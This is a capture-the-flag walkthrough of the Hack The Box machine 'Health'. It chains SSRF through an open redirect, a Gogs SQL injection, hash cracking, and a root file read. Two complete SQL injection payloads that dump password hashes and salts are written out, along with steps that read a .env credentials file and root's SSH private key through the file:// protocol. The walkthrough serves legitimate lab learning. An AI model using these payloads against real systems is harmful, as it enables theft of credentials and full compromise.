Health - HTB - Key Points

Target's IP:

Hostname: health.htb

The functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.

Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:

python2 --port 80 --ip "')/**/union/**/all/**/select/**/1,'1',(select/**/passwd/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

Which gives us a very long hex string, 66c...37, and also:

python2 --port 80 --ip "')/**/union/**/all/**/select/**/1,'1',(select/**/salt/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

which gives us the salt for the hashing algorithm

Looking up on the internet, Gogs seems to be using PBKDF2 with SHA256, defaulting to 10000 rounds, so we need to construct the hash in the proper format for hashcat to crack it. The format is:


Cracking the password, we can log into ssh as susanne:

susanne@health:~$ cat user.txt

Monitoring for background processes, one stands out:

CMD: UID=0    PID=5851   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1

It's the process that runs the scheduled webhooks from the web application

Enumerating the box a little further, we can retrieve the credentials for the DB in /var/www/html/.env 


When we create a webhook on the web app, it is stored in the database. But from the DB console we can now modify the monitored URL without any filter in place, so we can read the filesystem as root by changing the entry in the DB like this:

9581a098-b8cf-4a54-9d85-dd243a959fef | |         0 | file:///root/.ssh/id_rsa | * * * * * | 2022-11-17 09:40:07 | 2022-11-17 09:40:07 |

Using the file protocol, as suggested on Hacktricks, allows us to read the flag:
root.txt: 7a9...f5e

Merry hacking ;)

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